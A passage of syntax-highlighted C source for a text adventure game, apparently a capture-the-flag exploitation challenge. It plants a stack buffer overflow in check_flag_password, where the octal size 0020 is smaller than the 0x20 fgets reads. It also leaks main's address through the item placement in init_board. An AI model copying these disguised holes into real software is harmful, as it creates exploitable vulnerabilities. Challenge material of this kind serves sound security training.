class="s">&#34;None&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="n">board</span><span class="p">[</span><span class="n">BOARD_SIZE</span><span class="p">][</span><span class="n">BOARD_SIZE</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">item_names</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;Sword&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;Shield&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;Potion&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;Key&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;Scroll&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;Amulet&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;Crown&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;Flag&#34;</span> </span></span><span class="line"><span class="cl"><span class="p">};</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">const</span> <span class="kt">char</span> <span class="n">item_symbols</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="sc">&#39;S&#39;</span><span class="p">,</span> <span class="sc">&#39;H&#39;</span><span class="p">,</span> <span class="sc">&#39;P&#39;</span><span class="p">,</span> <span class="sc">&#39;K&#39;</span><span class="p">,</span> <span class="sc">&#39;L&#39;</span><span class="p">,</span> <span class="sc">&#39;A&#39;</span><span class="p">,</span> <span class="sc">&#39;C&#39;</span><span class="p">,</span> <span class="sc">&#39;F&#39;</span> </span></span><span class="line"><span class="cl"><span class="p">};</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="n">inventory</span><span class="p">[</span><span class="n">NUM_ITEMS</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">print_banner</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ╔═══════════════════════════════════════════╗&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ║ ⚔️ ADVENTURE IN THE DARK MAZE ⚔️ ║&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ║ ~ A Quest for Glory ~ ║&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ╚═══════════════════════════════════════════╝&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; In the ancient dungeon of the Forgotten Realm,&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; treasures await the brave adventurer...&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">print_help</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ┌─────────── COMMANDS ───────────┐&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; │ n/s/e/w - Move North/South/ │&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; │ East/West │&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; │ look - Look around │&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; │ inv - Check inventory │&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; │ grab - Pick up item │&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; │ help - Show this help │&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; │ quit - Leave the dungeon │&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; └────────────────────────────────┘&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">print_inventory</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ╔═════════ INVENTORY ═════════╗&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">item_count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NUM_ITEMS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">inventory</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34; ║ [%c] %-22s ║</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">item_symbols</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">item_names</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> <span class="n">item_count</span><span class="o">++</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">item_count</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ║ (empty) ║&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ╠═════════════════════════════╣&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34; ║ %2d,%2d %d/%d %3d/%3d %-6s ║</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">player_x</span><span class="p">,</span> <span class="n">player_y</span><span class="p">,</span> <span class="n">item_count</span><span class="p">,</span> <span class="n">NUM_ITEMS</span><span class="p">,</span> <span class="n">move_count</span><span class="p">,</span> <span class="n">MAX_MOVES</span><span class="p">,</span> <span class="n">last_item</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ╚═════════════════════════════╝&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">look_around</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ~~ You peer into the darkness ~~&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34; You stand at position (%d, %d).</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">player_x</span><span class="p">,</span> <span class="n">player_y</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">board</span><span class="p">[</span><span class="n">player_y</span><span class="p">][</span><span class="n">player_x</span><span class="p">]</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">item_idx</span> <span class="o">=</span> <span class="n">board</span><span class="p">[</span><span class="n">player_y</span><span class="p">][</span><span class="n">player_x</span><span class="p">]</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34; A glimmering %s lies at your feet!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">item_names</span><span class="p">[</span><span class="n">item_idx</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; The cold stone floor is bare.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">check_flag_password</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">password</span><span class="p">[</span><span class="mo">0020</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ╔═══════════════════════════════════════╗&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ║ The sacred Flag pulses with power! ║&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ║ Speak the ancient password to ║&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ║ unlock its secrets... ║&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ╚═══════════════════════════════════════╝&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34; Password: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nf">fgets</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="n">stdin</span><span class="p">)</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">password</span><span class="p">[</span><span class="nf">strcspn</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="s">&#34;</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">)]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="s">&#34;easter_egg&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; *** CONGRATULATIONS! ***&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; The Flag&#39;s magic flows through you!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; You have conquered the dungeon!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; The Flag rejects your words...&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; But you keep it anyway.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">grab_item</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">board</span><span class="p">[</span><span class="n">player_y</span><span class="p">][</span><span class="n">player_x</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; There is nothing here to grab.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">item_idx</span> <span class="o">=</span> <span class="n">board</span><span class="p">[</span><span class="n">player_y</span><span class="p">][</span><span class="n">player_x</span><span class="p">]</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34; You pick up the %s!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">item_names</span><span class="p">[</span><span class="n">item_idx</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> <span class="n">inventory</span><span class="p">[</span><span class="n">item_idx</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">board</span><span class="p">[</span><span class="n">player_y</span><span class="p">][</span><span class="n">player_x</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">last_item</span> <span class="o">=</span> <span class="n">item_names</span><span class="p">[</span><span class="n">item_idx</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">item_idx</span> <span class="o">==</span> <span class="mi">7</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">check_flag_password</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">move_player</span><span class="p">(</span><span class="kt">int</span> <span class="n">dx</span><span class="p">,</span> <span class="kt">int</span> <span class="n">dy</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">new_x</span> <span class="o">=</span> <span class="n">player_x</span> <span class="o">+</span> <span class="n">dx</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">new_y</span> <span class="o">=</span> <span class="n">player_y</span> <span class="o">+</span> <span class="n">dy</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">new_x</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">new_x</span> <span class="o">&gt;=</span> <span class="n">BOARD_SIZE</span> <span class="o">||</span> <span class="n">new_y</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">new_y</span> <span class="o">&gt;=</span> <span class="n">BOARD_SIZE</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; You bump into a cold stone wall.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">player_x</span> <span class="o">=</span> <span class="n">new_x</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">player_y</span> <span class="o">=</span> <span class="n">new_y</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">directions</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="s">&#34;north&#34;</span><span class="p">,</span> <span class="s">&#34;south&#34;</span><span class="p">,</span> <span class="s">&#34;east&#34;</span><span class="p">,</span> <span class="s">&#34;west&#34;</span><span class="p">};</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">dir_idx</span> <span class="o">=</span> <span class="p">(</span><span class="n">dy</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">?</span> <span class="mi">0</span> <span class="o">:</span> <span class="p">(</span><span class="n">dy</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="p">(</span><span class="n">dx</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="o">?</span> <span class="mi">2</span> <span class="o">:</span> <span class="mi">3</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34; You venture %s...</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">directions</span><span class="p">[</span><span class="n">dir_idx</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">board</span><span class="p">[</span><span class="n">player_y</span><span class="p">][</span><span class="n">player_x</span><span class="p">]</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">item_idx</span> <span class="o">=</span> <span class="n">board</span><span class="p">[</span><span class="n">player_y</span><span class="p">][</span><span class="n">player_x</span><span class="p">]</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34; You spot a %s here!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">item_names</span><span class="p">[</span><span class="n">item_idx</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">init_board</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">(</span><span class="n">board</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">board</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">main</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span><span class="n">bytes</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">addr</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="n">NUM_ITEMS</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="p">(</span><span class="n">bytes</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&gt;&gt;</span> <span class="mi">4</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x0F</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">y</span> <span class="o">=</span> <span class="n">bytes</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0x0F</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span><span class="n">board</span><span class="p">[</span><span class="n">y</span><span class="p">][</span><span class="n">x</span><span class="p">]</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">x</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">%</span> <span class="n">BOARD_SIZE</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">x</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="n">y</span> <span class="o">=</span> <span class="p">(</span><span class="n">y</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">%</span> <span class="n">BOARD_SIZE</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">board</span><span class="p">[</span><span class="n">y</span><span class="p">][</span><span class="n">x</span><span class="p">]</span> <span class="o">=</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">input</span><span class="p">[</span><span class="n">INPUT_SIZE</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">setbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">setbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">print_banner</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="nf">init_board</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="nf">print_help</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span><span class="n">move_count</span> <span class="o">&lt;</span> <span class="n">MAX_MOVES</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;&gt; &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nf">fgets</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">input</span><span class="p">),</span> <span class="n">stdin</span><span class="p">)</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">input</span><span class="p">[</span><span class="nf">strcspn</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="s">&#34;</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">)]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">strncpy</span><span class="p">(</span><span class="n">history</span><span class="p">[</span><span class="n">move_count</span><span class="p">],</span> <span class="n">input</span><span class="p">,</span> <span class="n">INPUT_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">history</span><span class="p">[</span><span class="n">move_count</span><span class="p">][</span><span class="n">INPUT_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="sc">&#39;\0&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">move_count</span><span class="o">++</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="s">&#34;n&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">move_player</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="s">&#34;s&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">move_player</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="s">&#34;e&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">move_player</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="s">&#34;w&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">move_player</span><span class="p">(</span><span class="o">-</span><span 